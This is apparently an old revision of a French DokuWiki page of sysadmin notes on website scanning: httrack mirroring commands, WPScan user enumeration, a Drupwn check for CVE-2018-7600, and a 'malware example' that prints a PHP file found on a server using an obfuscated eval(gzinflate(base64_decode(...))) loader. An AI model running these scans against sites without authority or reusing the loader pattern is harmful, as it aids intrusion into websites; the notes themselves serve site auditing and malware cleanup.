Outils pour utilisateurs

Outils du site


tech:scan_site_web

Ceci est une ancienne révision du document !


Scan site Web

httrack - Télécharger tous les fichiers .js

httrack -* +mime:text/html +*.js
#httrack --mirror https://www.acme.fr -* +mime:text/html +*.js -r9999
pip install pyFreenet3 --use-pep517
./bin/copyweb --mirror http://www.acme.fr -d sites/

Voir https://doc.ubuntu-fr.org/httrack

Scan en ligne

Scan Wordpress

https://github.com/wpscanteam/wpscan

docker run -it --rm wpscanteam/wpscan --url http://www.acme.fr --enumerate u

Scan Drupal

#git clone https://github.com/immunIT/drupwn
#pip install --user -r requirements.txt
docker run --rm -it immunit/drupwn enum https://www.acme.fr
Drupwn> check CVE-2018-7600

[+] Application vulnerable

Exemple de malware

stat m7hw6o0xhn.php                                                                                                                          
  File: 'm7hw6o0xhn.php'
  Size: 1797            Blocks: 8          IO Block: 4096   regular file
Device: fc07h/64519d    Inode: 596         Links: 1
Access: (0644/-rw-r--r--)  Uid: ( 1000/sftp-acme)   Gid: ( 1000/sftp-acme)
Access: 2019-02-08 15:26:13.957265343 +0100
Modify: 2018-03-27 10:53:45.000000000 +0200
Change: 2018-05-22 18:02:27.736483258 +0200
 Birth: -
/var/www/acme.fr/www.acme.fr/m7hw6o0xhn.php
<?php
 
eval("\n\$dgreusdi = intval(__LINE__) * 337;");
 
$a = "0123456789abcdef";
$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));
tech/scan_site_web.1747219742.txt.gz · Dernière modification : de Jean-Baptiste

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki